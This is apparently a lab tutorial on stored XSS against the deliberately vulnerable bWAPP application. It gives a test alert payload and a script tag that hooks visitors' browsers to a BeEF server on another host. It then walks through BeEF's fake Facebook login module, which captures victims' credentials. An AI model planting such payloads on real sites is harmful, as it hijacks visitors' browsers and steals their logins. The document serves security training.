Stored XSS (or Persistent XSS) is the most dangerous type of XSS. The attacker injects a script (payload) that is permanently stored (persisted) on the vulnerable site.
The malicious code is executed every time a browser visits an “infected” page, so with only one attack, the attacker can exploit many users. Usually the malicious script is inserted in a comment field on a blog or in a forum post.
For this tutorial we’ll use bWAPP vulnerable application.
Start the bee-box and verify the IP address (open the terminal and type “ifconfig”), in my case 192.168.1.10. Now open your browser and connect to bee-box address. Login in and choose Cross-Site Scripting – Stored (Blog)
CHECK IF IT IS VULNERABLE
To test if the input field is vulnerable, we try to inject this script:
1 |
<script>alert('XSS')</script> |
If it is vulnerable, it will show us an alert box that says: XSS. How you can see, it show us an alert box, this means that it is vulnerable.
Now, if you try to login in and visit this page from another browser, you’ll see that the alert box will appear, this is because our payload is saved into the database.
BeEF
A common way to exploit a XSS is BeEF (Browser Exploitation Framework). With this tool we can do many different types of attacks. You can download BeEF from here. If you use kali linux or any other penetration testing distro you will find it already installed.
When you open BeEF you will see the Hook URL, that will be our payload, and the UI URL, that is the user interface panel
Open the user interface panel in your browser and login in, the default username and password are beef:beef.
On the left side, we can see “Online Browsers” and “Offline Browsers”, which represent the hooked browsers, some of which are online and the others are offline.
Ok let’s start with the attack. Get your IP address (open the terminal and type “ifconfig”) and insert it in the Hook URL in this way
1 |
<script src="http://192.168.1.19:3000/hook.js"></script> |
Now in bWAPP delete the script that you have inserted previously, and add the new BeEF script
Try to visit the “infected” page with another browser or another computer and you should see the hooked browsers. In my case Linux and OSX
Now we try an attack to see what BeEF can do.
Go to the Commands tab, open Social Engineering folder and select Pretty Theft. In Dialog Type select Facebook and click on execute.
This command will open on the victim’s browser a Facebook login dialog box. If the victim will enter his login data, we will receive them.
If you click on the “command result”, you will see the victim credentials
This is just one example of what you can do with BeEF, as you can see, there are many other commands that can be executed.